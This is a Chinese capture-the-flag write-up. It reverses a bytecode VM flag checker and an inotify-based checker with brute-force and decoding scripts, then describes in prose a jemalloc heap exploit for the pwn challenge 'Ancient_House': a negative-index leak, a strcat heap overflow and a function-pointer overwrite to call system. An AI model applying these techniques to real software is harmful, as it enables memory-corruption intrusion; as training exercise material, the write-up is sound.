0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000007, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x0000000F, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000017, 0x0000000B, 0x00000001, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x00000023, 0x0000000B, 0x00000008, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000009, 0x00000003, 0x000001EB, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000003, 0x00000081, 0x00000004, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]
class disasm:
def __init__(self, bytecode) -> None:
self.bytecode = bytecode
def addr_transfer(self, addr):
return "_" + hex(addr)[2:]
def disasm(self):
pc = 0
all_asm = ''
while pc < 3828:
opcode = self.bytecode[pc]
asm_text = ''
if opcode == 1:
asm_text = "%s: reg_char = Memory[reg_addr]" % self.addr_transfer(pc)
pc += 1
elif opcode == 2:
asm_text = '%s: puts("Checking flag...");' % self.addr_transfer(pc)
pc += 1
elif opcode == 3:
asm_text = "%s: reg_int = %d" % (self.addr_transfer(pc), self.bytecode[pc + 1])
pc += 2
elif opcode == 4:
asm_text = """%s:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;""" % self.addr_transfer(pc)
pc += 1
elif opcode == 5:
asm_text = "%s: reg_int += 1" % self.addr_transfer(pc)
pc += 1
elif opcode == 6:
# reg_char = flag[bytecode[i + 1]];
asm_text = "%s: reg_char = flag[%d]" % (self.addr_transfer(pc), self.bytecode[pc + 1])
pc += 2
elif opcode == 7:
asm_text = "%s: reg_int = reg_char" % self.addr_transfer(pc)
pc += 1
elif opcode == 8:
asm_text = "%s: buffer[%d] = reg_char" % (self.addr_transfer(pc), self.bytecode[pc + 1])
pc += 2
elif opcode == 9:
asm_text = """%s:
buffer2 = malloc(0xC8uLL);
buffer2 = sub_117B(buffer);
v9 = 0;
buffer = malloc(5uLL);""" % self.addr_transfer(pc)
pc += 1
elif opcode == 10:
asm_text = """%s:
if ( Memory[reg_int] != buffer2[v9]) )
v6 = 10;
++v9;""" % self.addr_transfer(pc)
pc += 1
elif opcode == 11:
asm_text = "%s: if ((char)(reg_char %% 9) != %d) v6 = 10;" % (self.addr_transfer(pc), self.bytecode[pc + 1])
pc += 2
elif opcode == 12:
asm_text = "%s: putchar(Memory[reg_int + v6])" % self.addr_transfer(pc)
pc += 1
else:
print(opcode, pc)
asm_text += ";\n"
all_asm += asm_text
open("result.cpp", "w").write(all_asm)
dis = disasm(bytecode)
dis.disasm()
得到反编译结果如下 (片段)
_0: reg_char = flag[0];
_2: if ((char)(reg_char % 9) != 6) v6 = 10;;
_4: reg_int = reg_char;
_5:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr
_6: reg_char = Memory[reg_addr];
_7: buffer[0] = reg_char;
_9: reg_char = flag[8];
_b: if ((char)(reg_char % 9) != 5) v6 = 10;;
_d: reg_int = reg_char;
_e:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_f: reg_char = Memory[reg_addr];
_10: buffer[1] = reg_char;
_12: reg_char = flag[16];
_14: if ((char)(reg_char % 9) != 8) v6 = 10;;
_16: reg_int = reg_char;
_17:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_18: reg_char = Memory[reg_addr];
_19: buffer[2] = reg_char;
_1b: reg_char = flag[24];
_1d: if ((char)(reg_char % 9) != 3) v6 = 10;;
_1f: reg_int = reg_char;
_20:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_21: reg_char = Memory[reg_addr];
_22: buffer[3] = reg_char;
_24: reg_char = flag[31];
_26: if ((char)(reg_char % 9) != 3) v6 = 10;;
_28: reg_int = reg_char;
_29:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_2a: reg_char = Memory[reg_addr];
_2b: buffer[4] = reg_char;
_2d:
buffer2 = malloc(0xC8uLL);
buffer2 = sub_117B(buffer);
v9 = 0;
buffer = malloc(5uLL);;
_2e: reg_int = 140;
_30:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_31: puts("Checking flag...");;
_32:
if ( Memory[reg_int] != buffer2[v9]) )
这是一组数据的验证,一共有 8 组这样的验证,一共验证 flag 36 个字符。
这一组验证中,flag [x] 经过变换得到 buffer [n] 且 需要满足模数条件, 一组 buffer 计算完成后调用 sub_117B 进一步计算,最终再把该函数的返回值与目标数据比较。
flag[x] 到 buffer[n] 不是唯一映射, 所以有模数限制。
映射关系如下
// Input: 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
// Output:8472001712585036770886014270876835165635f3254476f3554f516ff338
sub_117B 的输入是4个字符或5个字符,字符集为0 - 8
这个函数利用 fork 实现递归,简单 patch 后进行爆破即可
from pwn import *
import json
import os
from multiprocessing.dummy import Pool as ThreadPool
threads = 10
tasks2 = [[] for i in range(threads)]
tresult = []
def RunT2(n):
for m in tasks2[n]:
while True:
try:
p = process("/home/pandaos/Desktop/fuck/f%d/flagchecker1" % n, cwd = "/home/pandaos/Desktop/fuck/f%d/" % n)
try:
path = "/home/pandaos/Desktop/fuck/f%d/check" % n
if os.path.exists(path):
os.remove(path)
except Exception:
pass
p.sendline(m.encode("ascii"))
data = p.recvline()
if b'Can' in data or b'Cannot' in data:
raise
break
except Exception:
continue
finally:
p.close()
tresult.append((m, data))
fuck_table = '012345678'
i = [0] * 5
data_map = dict()
tasks = []
k = 0
tmp_task = []
for i[0] in fuck_table:
for i[1] in fuck_table:
for i[2] in fuck_table:
for i[3] in fuck_table:
for i[4] in fuck_table:
test = "".join(i)
tasks.append((test, k % 10))
tasks2[k % 10].append(test)
k += 1
mythreads = []
for i in range(threads):
th = threading.Thread(target=RunT2, args=(i, ))
th.start()
mythreads.append(th)
for th in mythreads:
th.join()
print(tresult)
open("ffk.json", "w").write(str(tresult))
提取比较数据后在爆破结果中查找对应的输入
比较数据与对应的 sub_117B 输入参数
84721
234231224221234231224221233423312324232124342431242424212434243124242421243342433124324243212342312242212342312242212334233123242321343124213431242133433132432143443142442143443142442143344331432443213431242134312421334331324321
1138
44244442444432443442444452445412414124141324134124141524151421414214143214314214145214511211112111132113112111152115
80481
224221242124242421244241224221242125242521254251254242542125442541252425212542512242212421242424212442412242212421242141424421444124214152452154515424542154454152452154512421414244214441242141
224262646622426264663232432632633436362242626466224262646632324326326334363632324326326334363632324326326334363633233243326332633334336336
57518
444244444124414342434431243145424544512451444244444124414342434431243145424544512451434424344434124341433424334433124331435424354435124351344234434123413342334331233135423543512351344234434123413342334331233135423543512351334423344334123341333423334333123331335423354335123351544254454125415342534531253155425545512551544254454125415342534531253155425545512551534425344534125341533425334533125331535425354535125351
343335344343345343335344343345344434433445344343345343335344343345343335242325244243245242325244243245244424432445244243245242325244243245242325
02162
34334234433442346334623463346231331231433142316331623163316224324224432442246324622463246221321221432142216321622163216253435342534435344253463534625346353462531353125314353142531635316253163531625243524252443524425246352462524635246252135212521435214252163521625216352162343342344334423463346234633462313312314331423163316231633162243242244324422463246224632462213212214321422163216221632162
1854
424424442442342344234254254425444444443434434545445124124412412312341231251254125141441413134131515415
最后计算 flag
flag = [0] * 36
t1 = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'
t2 = '80230103415684857787827121576760008653455327627513233564681454fffffff3003058723412112363462845'
dict_data = {}
for i in range(len(t2)):
if t2[i] not in dict_data:
dict_data[t2[i]] = []
dict_data[t2[i]] += t1[i]
print(dict_data)
def mrev(ch, idx):
tt = '658332610045238537383836556104255318'
for x in dict_data[ch]:
if ord(x) % 9 == int(tt[idx]):
return x
raise
#84721
flag[0] = mrev('8', 0)
flag[8] = mrev('4', 1)
flag[16] = mrev('7', 2)
flag[24] = mrev('2', 3)
flag[31] = mrev('1', 4)
#1138
flag[1] = mrev('1', 5)
flag[9] = mrev('1', 6)
flag[17] = mrev('3', 7)
flag[25] = mrev('8', 8)
#80481
flag[2] = mrev('8', 9)
flag[10] = mrev('0', 10)
flag[18] = mrev('4', 11)
flag[26] = mrev('8', 12)
flag[32] = mrev('1', 13)
#7786
flag[3] = mrev('7', 14)
flag[11] = mrev('7', 15)
flag[19] = mrev('8', 16)
flag[27] = mrev('6', 17)
#57518
flag[4] = mrev('5', 18)
flag[12] = mrev('7', 19)
flag[20] = mrev('5', 20)
flag[28] = mrev('1', 21)
flag[33] = mrev('8', 22)
#2445
flag[5] = mrev('2', 23)
flag[13] = mrev('4', 24)
flag[21] = mrev('4', 25)
flag[29] = mrev('5', 26)
#02162
flag[6] = mrev('0', 27)
flag[14] = mrev('2', 28)
flag[22] = mrev('1', 29)
flag[30] = mrev('6', 30)
flag[34] = mrev('2', 31)
#1854
flag[7] = mrev('1', 32)
flag[15] = mrev('8', 33)
flag[23] = mrev('5', 34)
flag[35] = mrev('4', 35)
print(flag)
总结一下,这道题逻辑比较简单,提取数据过程比较繁琐,适合用来练习调试技巧与IDA脚本的编写。
noodes
比较的地方
if ( !strcmp(
s1,
"dfxXdf5FcwL\\adsUddPedd}UdflZafn~af9TmflZcwlZafilddKYafM^dfxRmfENcwENddXmdf\\Raff\\df{xddL[adeiadJkdfW5cwiTdd7"
"Ydf^zadkKcw:jadeudfU=dfj~dd[}dfM9cwp7dfhnmfTjcwTjddyQdfftdd5UdfIxddGydfgnddjYdfqZcwqPcwfpdflLddUoaf~vddWqafZJd"
"f=Tcw{Zmf|Fcw|FddnkadUgdfj\\dfr^dd]SdfGJcwwJdfFtcwzFcwXVcwE|cwkPddWMdd]iadu:cwFRad\\IafXrafNxmfElcwElafJvafx9d"
"f4|dd8mmfH~cwH~mfT~cwT~afkFafvpdfj5dd}SafVRmfFpmfP|mfThmfNLmf5ZcwFpcwP|cw\\xcw=7cwyncwG|cwThcwNLcw\\pcwI^cw5ZcwOT") )
s1的生成
v45 = __readfsqword(0x28u);
index = 0;
s_index = 0;
sub_55D31246E16A();
sub_55D31246E1FA();
fd = inotify_init(); //初始化一个 inotify 实例
if ( fd < 0 )
perror("inotify_init");
sub_55D31246E4B7("/tmp/chall/"); //初始化文件
wd = inotify_add_watch(fd, "/tmp/chall/", 0x33Fu); // 将监视添加到初始化的 inotify 实例
pid = fork(); //新建进程
if ( !pid )
sub_55D31246E668("/tmp/chall/"); //用户输入处理,文件变动
if ( waitpid(pid, &stat_loc, 0) == -1 )
{
perror("waitpid failed\n");
goto LABEL_35;
}
v40 = BYTE1(stat_loc);
printf("%d", BYTE1(stat_loc));
size = read(fd, buf, 0x8000uLL);
if ( size < 0 )
perror("read");
while ( index < size )
{
byte = &buf[index];
if ( !*((_DWORD *)byte + 3) )
goto LABEL_30;
if ( (*((_DWORD *)byte + 1) & 0x100) != 0 ) // IN_CREATE
{
v3 = s_index;
if ( (*((_DWORD *)byte + 1) & 0x40000000) != 0 )// IN_ISDIR
{
++s_index;
s1[v3] = 'c';
v4 = s_index++;
s1[v4] = 'd';
}
else
{
++s_index;
s1[v3] = 'c';
v5 = s_index++;
s1[v5] = 'f';
}
LABEL_26:
v23 = byte[16] + 4;
v24 = s_index++;
s1[v24] = v23;
v25 = byte[17] + 4;
v26 = s_index++;
s1[v26] = v25;
goto LABEL_30;
}
if ( (*((_DWORD *)byte + 1) & 0x200) != 0 ) // IN_DELETE
{
v6 = s_index;
if ( (*((_DWORD *)byte + 1) & 0x40000000) != 0 )
{
++s_index;
s1[v6] = 'd';
v7 = s_index++;
s1[v7] = 'd';
}
else
{
++s_index;
s1[v6] = 'd';
v8 = s_index++;
s1[v8] = 'f';
}
goto LABEL_26;
}
if ( (*((_DWORD *)byte + 1) & 8) != 0 ) // IN_CLOSE_WRITE
{
v9 = s_index++;
s1[v9] = 'c';
v10 = s_index++;
s1[v10] = 'w';
v11 = byte[16] + 4;
v12 = s_index++;
s1[v12] = v11;
v13 = byte[17] + 4;
v14 = s_index++;
s1[v14] = v13;
goto LABEL_30;
}
if ( (*((_DWORD *)byte + 1) & 1) != 0 ) // IN_ACCESS
{
v15 = s_index++;
s1[v15] = 'a';
v16 = s_index++;
s1[v16] = 'c';
v17 = byte[16] + 4;
v18 = s_index++;
s1[v18] = v17;
v19 = byte[17] + 4;
v20 = s_index++;
s1[v20] = v19;
goto LABEL_30;
}
if ( (*((_DWORD *)byte + 1) & 4) != 0 ) // IN_ATTRIB
{
v21 = s_index;
if ( (*((_DWORD *)byte + 1) & 0x40000000) != 0 )
{
++s_index;
s1[v21] = 'a';
v22 = s_index++;
s1[v22] = 'd';
}
else
{
++s_index;
s1[v21] = 'a';
v27 = s_index++;
s1[v27] = 'f';
}
goto LABEL_26;
}
if ( (*((_DWORD *)byte + 1) & 2) != 0 ) // IN_MODIFY
{
v28 = s_index++;
s1[v28] = 'm';
v29 = s_index++;
s1[v29] = 'f';
v30 = byte[16] + 4;
v31 = s_index++;
s1[v31] = v30;
v32 = byte[17] + 4;
v33 = s_index++;
s1[v33] = v32;
}
LABEL_30:
index += *((_DWORD *)byte + 3) + 16;
}
inotify
这个感觉和git有点点像, 监控文件的变动, 变动会生成事件
struct inotify_event {
int wd; /* Watch descriptor */
uint32_t mask; /* Mask of events */
uint32_t cookie; /* Unique cookie associating related
events (for rename(2)) */
uint32_t len; /* Size of name field */
char name[]; /* Optional null-terminated name */
};
这里涉及的事件
IN_ACCESS 0x00000001
文件被访问(读取)(*)。
IN_CLOSE_WRITE 0x00000008
为写入而打开的文件已关闭 (*)。
IN_ATTRIB 0x00000004
权限修改
IN_ISDIR 0x40000000
事件的目标是文件夹
IN_CREATE 0x00000100
有新文件产生(可能是目录)
IN_DELETE 0x00000200
有文件被删除(可能是目录)
IN_MODIFY 0x00000002
修改文件
这里4字节长度刚好对应index += *((_DWORD *)byte + 3) + 16;的加16
处理输入
1: stream[v3] = fopen(dest, "a+");
2: fclose(stream[--v9]);//生成cw
3: fwrite("Wrong", 1uLL, 5uLL, stream[v9 - 1]);//生成mf
4: unlink(dest);//生成df
5: chmod(dest, 0x164u);//生成af
6: rmdir(dest);//生成dd
7: mkdir(dest, 0x1C0u);//生成cd
8:exit(0)
除了2,3不能有名称之外都有2字节的名称
分析比较字符串
这里的字符串没有新建操作, 前面的文件初始化已经完成了(监控开启之前)
注意:df之后不能再打开文件, 否则会出现新建操作,(这里有一处就是这样df之后才mf的, 这里应该再df之前就打开, 我把这个操作放在了最前面, mf之前和cw之前一定要打开文件指针, 打开操作只需要一次, (mf, cw相同的文件只打开一次, 每次mf都会有cw收尾), exit会关闭所有的文件指针(这里也会被记录, 后打开的先关闭)
生成输入脚本: (因为mf操作不多, 我就直接手动删除多余的新建操作, 最后再加个8)
#include<iostream>
using namespace std;
int main()
{
char a[437] = {
0x64, 0x66, 0x78, 0x58, 0x64, 0x66, 0x35, 0x46, 0x63, 0x77, 0x4C, 0x5C, 0x61, 0x64, 0x73, 0x55,
0x64, 0x64, 0x50, 0x65, 0x64, 0x64, 0x7D, 0x55, 0x64, 0x66, 0x6C, 0x5A, 0x61, 0x66, 0x6E, 0x7E,
0x61, 0x66, 0x39, 0x54, 0x6D, 0x66, 0x6C, 0x5A, 0x63, 0x77, 0x6C, 0x5A, 0x61, 0x66, 0x69, 0x6C,
0x64, 0x64, 0x4B, 0x59, 0x61, 0x66, 0x4D, 0x5E, 0x64, 0x66, 0x78, 0x52, 0x6D, 0x66, 0x45, 0x4E,
0x63, 0x77, 0x45, 0x4E, 0x64, 0x64, 0x58, 0x6D, 0x64, 0x66, 0x5C, 0x52, 0x61, 0x66, 0x66, 0x5C,
0x64, 0x66, 0x7B, 0x78, 0x64, 0x64, 0x4C, 0x5B, 0x61, 0x64, 0x65, 0x69, 0x61, 0x64, 0x4A, 0x6B,
0x64, 0x66, 0x57, 0x35, 0x63, 0x77, 0x69, 0x54, 0x64, 0x64, 0x37, 0x59, 0x64, 0x66, 0x5E, 0x7A,
0x61, 0x64, 0x6B, 0x4B, 0x63, 0x77, 0x3A, 0x6A, 0x61, 0x64, 0x65, 0x75, 0x64, 0x66, 0x55, 0x3D,
0x64, 0x66, 0x6A, 0x7E, 0x64, 0x64, 0x5B, 0x7D, 0x64, 0x66, 0x4D, 0x39, 0x63, 0x77, 0x70, 0x37,
0x64, 0x66, 0x68, 0x6E, 0x6D, 0x66, 0x54, 0x6A, 0x63, 0x77, 0x54, 0x6A, 0x64, 0x64, 0x79, 0x51,
0x64, 0x66, 0x66, 0x74, 0x64, 0x64, 0x35, 0x55, 0x64, 0x66, 0x49, 0x78, 0x64, 0x64, 0x47, 0x79,
0x64, 0x66, 0x67, 0x6E, 0x64, 0x64, 0x6A, 0x59, 0x64, 0x66, 0x71, 0x5A, 0x63, 0x77, 0x71, 0x50,
0x63, 0x77, 0x66, 0x70, 0x64, 0x66, 0x6C, 0x4C, 0x64, 0x64, 0x55, 0x6F, 0x61, 0x66, 0x7E, 0x76,
0x64, 0x64, 0x57, 0x71, 0x61, 0x66, 0x5A, 0x4A, 0x64, 0x66, 0x3D, 0x54, 0x63, 0x77, 0x7B, 0x5A,
0x6D, 0x66, 0x7C, 0x46, 0x63, 0x77, 0x7C, 0x46, 0x64, 0x64, 0x6E, 0x6B, 0x61, 0x64, 0x55, 0x67,
0x64, 0x66, 0x6A, 0x5C, 0x64, 0x66, 0x72, 0x5E, 0x64, 0x64, 0x5D, 0x53, 0x64, 0x66, 0x47, 0x4A,
0x63, 0x77, 0x77, 0x4A, 0x64, 0x66, 0x46, 0x74, 0x63, 0x77, 0x7A, 0x46, 0x63, 0x77, 0x58, 0x56,
0x63, 0x77, 0x45, 0x7C, 0x63, 0x77, 0x6B, 0x50, 0x64, 0x64, 0x57, 0x4D, 0x64, 0x64, 0x5D, 0x69,
0x61, 0x64, 0x75, 0x3A, 0x63, 0x77, 0x46, 0x52, 0x61, 0x64, 0x5C, 0x49, 0x61, 0x66, 0x58, 0x72,
0x61, 0x66, 0x4E, 0x78, 0x6D, 0x66, 0x45, 0x6C, 0x63, 0x77, 0x45, 0x6C, 0x61, 0x66, 0x4A, 0x76,
0x61, 0x66, 0x78, 0x39, 0x64, 0x66, 0x34, 0x7C, 0x64, 0x64, 0x38, 0x6D, 0x6D, 0x66, 0x48, 0x7E,
0x63, 0x77, 0x48, 0x7E, 0x6D, 0x66, 0x54, 0x7E, 0x63, 0x77, 0x54, 0x7E, 0x61, 0x66, 0x6B, 0x46,
0x61, 0x66, 0x76, 0x70, 0x64, 0x66, 0x6A, 0x35, 0x64, 0x64, 0x7D, 0x53, 0x61, 0x66, 0x56, 0x52,
0x6D, 0x66, 0x46, 0x70, 0x6D, 0x66, 0x50, 0x7C, 0x6D, 0x66, 0x54, 0x68, 0x6D, 0x66, 0x4E, 0x4C,
0x6D, 0x66, 0x35, 0x5A, 0x63, 0x77, 0x46, 0x70, 0x63, 0x77, 0x50, 0x7C, 0x63, 0x77, 0x5C, 0x78,
0x63, 0x77, 0x3D, 0x37, 0x63, 0x77, 0x79, 0x6E, 0x63, 0x77, 0x47, 0x7C, 0x63, 0x77, 0x54, 0x68,
0x63, 0x77, 0x4E, 0x4C, 0x63, 0x77, 0x5C, 0x70, 0x63, 0x77, 0x49, 0x5E, 0x63, 0x77, 0x35, 0x5A,
0x63, 0x77, 0x4F, 0x54, 0x00
};
for (int i = 0; i < 437; i += 4)
{
if (a[i] == 'c' && a[i + 1] == 'f')
cout << "1" << char((a[i + 2] - 4)) << char((a[i + 3] - 4));
else if (a[i] == 'c' && a[i + 1] == 'w')
cout << "1" << char((a[i + 2] - 4)) << char((a[i + 3] - 4)) << "2";
else if (a[i] == 'm' && a[i + 1] == 'f')
cout << "1" << char((a[i + 2] - 4)) << char((a[i + 3] - 4)) << "3";
else if (a[i] == 'd' && a[i + 1] == 'f')
cout << "4" << char((a[i + 2] - 4)) << char((a[i + 3] - 4));
else if (a[i] == 'a' && a[i + 1] == 'f')
cout << "5" << char((a[i + 2] - 4)) << char((a[i + 3] - 4));
else if (a[i] == 'a' && a[i + 1] == 'd')
cout << "5" << char((a[i + 2] - 4)) << char((a[i + 3] - 4));
else if (a[i] == 'd' && a[i + 1] == 'd')
cout << "6" << char((a[i + 2] - 4)) << char((a[i + 3] - 4));
else if (a[i] == 'c' && a[i + 1] == 'd')
cout << "7" << char((a[i + 2] - 4)) << char((a[i + 3] - 4));
}
system("pause");
}
得到1hV4tT41B1HX25oQ6La6yQ4hV5jz55P325eh6GU5IZ4tN1AJ326Ti4XN5bX4wt6HW5ae5Fg4S11eP263U4Zv5gG16f25aq4Q94fz6Wy4I51l324dj1Pf326uM4bp61Q4Et6Cu4cj6fU4mV1mL21bl24hH6Qk5zr6Sm5VF49P1wV21xB326jg5Qc4fX4nZ6YO4CF1sF24Bp1vB21TR21Ax21gL26SI6Ye5q61BN25XE5Tn5Jt1Ah325Fr5t540x64i1Dz321Pz325gB5rl4f16yO5RN1Bl31Lx31Pd31JH311V3221Xt219321uj21Cx2221Xl21EZ221KP28
最后输入发现有错误, 调试之后发现, 从SafVR之后开始, 这里完全倒了过来,
要求的s1:mfFpmfP|mfThmfNLmf5ZcwFpcwP|cw\xcw=7cwyncwG|cwThcwNLcw\pcwI^cw5ZcwOT
生成的s1:mf5Zcw5ZmfNLcwNLcw\xcw=7cwyncwG|mfThcwThmfP|cwP|cw\pcwI^mfFpcwFpcwOT
具体调试了函数之后(前面有一个闹钟记得patch掉), 这里mf之后并没有把字符串写入, 是在fclose文件指针之后把文件修改, 那到底怎么连续修改之后再关闭文件指针呢, 这里我试了一下exit来关闭文件指针,把输入后面改成:
1hV4tT41B1HX25oQ6La6yQ4hV5jz55P325eh6GU5IZ4tN1AJ326Ti4XN5bX4wt6HW5ae5Fg4S11eP263U4Zv5gG16f25aq4Q94fz6Wy4I51l324dj1Pf326uM4bp61Q4Et6Cu4cj6fU4mV1mL21bl24hH6Qk5zr6Sm5VF49P1wV21xB326jg5Qc4fX4nZ6YO4CF1sF24Bp1vB21TR21Ax21gL26SI6Ye5q61BN25XE5Tn5Jt1Ah325Fr5t540x64i1Dz321Pz325gB5rl4f16yO5RN(这里开始修改)
1KP11V31EZ1Xl1JH31Pd31Cx1uj1931Xt1Lx31Bl38, 成功得到flag
pwn
Ancient_House
比较特殊的漏洞利用相关的点有以下三个,
p_func堆块内保存函数指针
程序在最开始设置p_func, 然后最后又进行调用,
通过汇编层的查看我们可以知道, 这个堆块p_func中, p_func[0]为函数地址, p_func[1]为函数参数1, 而且程序给了system函数地址, 我们的目标应该就是覆写这个p_func堆块,
负数数组越界
在batter功能中, 输入idx的时候没有经过什么校验, 存在一个负数数组越界的问题,
通过这个漏洞我们可以往上查找到chunklist前面的地址, 进行数据泄漏和修改,
而且要是保存地址内数据还是一个name地址,
最后我们找到了这里, 这个位置在曾经也被用作数据泄漏, 他是一个指向自己的指针, 这样我们可以把这个地址泄漏出来, 得到pie的偏移量.
值得注意的另一个点是, max_chunks在他后面, 并且恰好是chunk_list[idx]->health的位置, 计算后得到一个负数(5-15=-10),
并且因为这个max_chunks数据是一个unsigned int 类型数据, 在add中的数量限制也被解除了,
my_strcat堆溢出
这个是后面才发现的漏洞, 这个点卡住了很久,
在两个人物合并的时候, 会对他们的名字进行一次拼接, 这时候调用了my_strcat函数:
这里值得注意的是循环赋值里面, buf2内容赋值给buf1, 但是复制的长度却是buf1_size+buf2_size, 这里构造了一个溢出,
于是可以多写入buf2后面的一段内容, 这段内容我们也可以通过堆风水来构造,
利用
开始使用时, 内存布局,
size: addr-$heap_base
0x10: 0x6000
0x40: 0x7000
0x50: 0x8000
0x20: 0xa000
jemalloc的分配机制, 其实run并不会指定顺序, 只是malloc触发bin初始化获取到一个run就拿来用, 因此最开始三次malloc, 分别0x10, 0x40, 0x50, 已经被分配了,后续0x18(其实是0x20同一个run)会占一个, 如果出现新的大小就会使用新的未使用run补上,
另外我们看下具体p_func的位置:
前面标记的部分是run结构体, 后续0x60开始是第一个region, 也就是p_func,
我们的目标就是覆写这个位置,
因为我们目标是修改0x50的p_func, 如果在前面的0x40处向后覆写, 0x40最多写到0x8000-1的位置, p_func在0x8060,
而利用合并的话0x40由两个0x20合并, 则能溢出范围是0x8000-0x8020, 可以参考前面p_func的内存数据, 这0x20正好是run结构体, 于是我们可以尝试修改0x50的run结构体,
而且jemalloc的分配机制, 在run中, 就是靠这个结构体内数据+run基地址偏移找到region的, 我们应该可以直接修改为p_func未分配出来或者已经被free的状态,
这里补一句, 最开始我尝试在某次调用free修改参数为p_func指针, 并获取到free运行后这个run的状态, 但是因为此时没有在使用region, run也被回收, 他的run->magic位置为null, 也就是整个run被认为是未初始化状态, 但是同时bin(0x50)->runcur=null,
如果我们这样利用, 因为bin(0x50)->runcur中仍然是这个run, 此时就会抛出错误,
于是我们设置run->magic=magic, 然后其他位置和free后一致,
